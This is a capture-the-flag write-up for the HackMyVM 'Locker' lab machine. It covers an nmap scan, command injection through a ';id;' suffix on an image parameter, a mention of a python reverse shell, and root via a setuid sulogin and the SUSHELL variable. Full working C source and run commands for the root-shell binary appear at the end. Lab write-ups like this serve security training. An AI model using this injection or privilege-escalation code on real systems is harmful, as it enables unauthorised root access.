HackMyVM-Locker
NMAP
nmap -p- -sC -sV 192.168.1.140
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-26 15:48 PKT
Nmap scan report for 192.168.1.140
Host is up (0.00013s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:6A:15:D5 (Oracle VirtualBox virtual NIC)
PORT 80
Clicking the hyperlink shows an image of a lock. The URL also carries a parameter named image with the value 1, so let's try changing that value.
There are three images. I ran gobuster but found nothing interesting, and I also tried steghide, strings and exiftool on the images without getting anything useful.
At this point I had no idea what to do, then thought about the obvious RCE, but got nothing. After asking for hints on Discord and looking at the screen for quite a while, I just added ;id; to the image parameter and got RCE working. The parameter value is evidently handed to a shell without sanitisation: the first semicolon ends whatever command the server builds around the value, so id runs as a command of its own and its output lands in the response.
To get a reverse shell we use a python reverse-shell payload, placed after the ; in the same way. Since the payload travels in a GET parameter it has to be URL-encoded; spaces, & and # would otherwise break the request before it reaches the shell.
Transfer linpeas for further enumeration. It isn't strictly necessary, but if you want to enumerate faster the script is very helpful.
Here we can see /usr/sbin/sulogin, which is not commonly set as SUID: it is normally run as root by init for single-user or rescue mode and has no reason to carry the setuid bit.
From the man page of sulogin:
sulogin looks for the environment variable SUSHELL or sushell to determine what shell to start. If the environment variable is not set, it will try to execute root's shell from /etc/passwd. If that fails, it will fall back to /bin/sh.
Create a C program that sets the uid and gid to 0 and executes /bin/bash using system().
Compile it and transfer it to the target machine.
As the man page says, sulogin looks for the SUSHELL variable and starts whatever it names, so set SUSHELL to the path of the compiled binary and run sulogin; we need to exit from sulogin and then run the command again.
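The program described above, written out as an added example (this is not the write-up's own code). It assumes /usr/sbin/sulogin is setuid root on the target and that sulogin execs whatever SUSHELL names; the binary name /tmp/rootshell is an arbitrary choice. The point a practitioner needs to understand is the setuid(0) call: when a setuid-root program execs us, only the effective uid is 0 while the real uid is still the low-privilege user, and bash drops back to the real uid when the two differ (unless started with -p), so all three ids must be set to 0 before the shell starts.

```c
/* rootshell.c - added example for the sulogin/SUSHELL step.
 *
 * Build (statically, so it runs on the target without matching libc):
 *   gcc -static -o rootshell rootshell.c
 * Copy it to the target as /tmp/rootshell (assumed path) and run:
 *   SUSHELL=/tmp/rootshell /usr/sbin/sulogin
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Precondition check: 1 if path is a regular file, owned by root, with the
 * setuid bit set. Run this against /usr/sbin/sulogin before bothering. */
int is_setuid_root(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return 0;
    return S_ISREG(st.st_mode) && st.st_uid == 0 && (st.st_mode & S_ISUID) != 0;
}

/* Make real, effective and saved uid/gid all 0. This only succeeds when we
 * were started with effective uid 0, i.e. sulogin really did exec us.
 * Returns 0 on success, -1 otherwise (setuid/setgid fail with EPERM). */
int raise_privs(void)
{
    if (setgid(0) != 0)
        return -1;
    if (setuid(0) != 0)
        return -1;
    return 0;
}

int main(void)
{
    if (raise_privs() != 0) {
        fprintf(stderr, "not running with euid 0 (euid=%u); was SUSHELL honoured?\n",
                (unsigned)geteuid());
        return 1;
    }
    /* system() runs /bin/sh -c "/bin/bash"; since uid == euid == 0 now,
     * bash keeps root instead of dropping privileges. */
    return system("/bin/bash");
}
```

If raise_privs() fails, sulogin did not exec the binary with effective uid 0, which usually means either the setuid bit is not set after all or SUSHELL was not exported into sulogin's environment.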